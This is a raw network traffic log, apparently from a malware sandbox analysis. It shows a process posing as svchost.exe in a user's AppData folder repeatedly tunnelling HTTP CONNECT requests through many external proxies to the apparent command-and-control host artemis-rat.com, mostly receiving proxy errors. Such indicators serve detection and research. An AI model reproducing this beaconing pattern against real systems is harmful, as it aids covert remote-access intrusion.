                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.336232901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2898192.168.2.55941343.128.146.421567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.343862057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2899192.168.2.55936393.171.220.229888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.344016075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.146133900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2900192.168.2.558806162.241.53.724985843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.346354008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2901192.168.2.55943031.43.179.2148043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.359407902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.513673067 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2902192.168.2.559432104.20.123.1648043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.359411955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.514008045 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2903192.168.2.559433172.67.3.988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.362171888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.516767979 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2904192.168.2.559449104.21.194.1828043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.375895977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.530092955 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2905192.168.2.55944474.48.7.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.376887083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2906192.168.2.559459172.67.182.1028043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.379353046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.543199062 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2907192.168.2.55941843.131.246.771567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.385339975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2908192.168.2.557716199.58.185.9414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.386471987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2909192.168.2.558741125.227.225.157338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.388889074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2910192.168.2.558739189.240.60.166909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.389663935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.892648935 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2911192.168.2.558760217.182.129.103312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.391449928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.117271900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2912192.168.2.559471172.67.181.858043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.391545057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.557770967 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2913192.168.2.55942158.234.116.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.393605947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2914192.168.2.559455103.152.112.1678043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.396409988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.570904016 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2915192.168.2.55872554.222.197.147808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.401619911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.241228104 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2916192.168.2.556032103.97.179.115108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.426654100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2917192.168.2.559420203.171.19.988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.444011927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2918192.168.2.55942380.67.8.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.512583971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2919192.168.2.559472191.102.159.157312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.512597084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.735568047 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2920192.168.2.55948145.196.151.120543243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.512928009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.729805946 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2921192.168.2.55942591.107.180.2508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
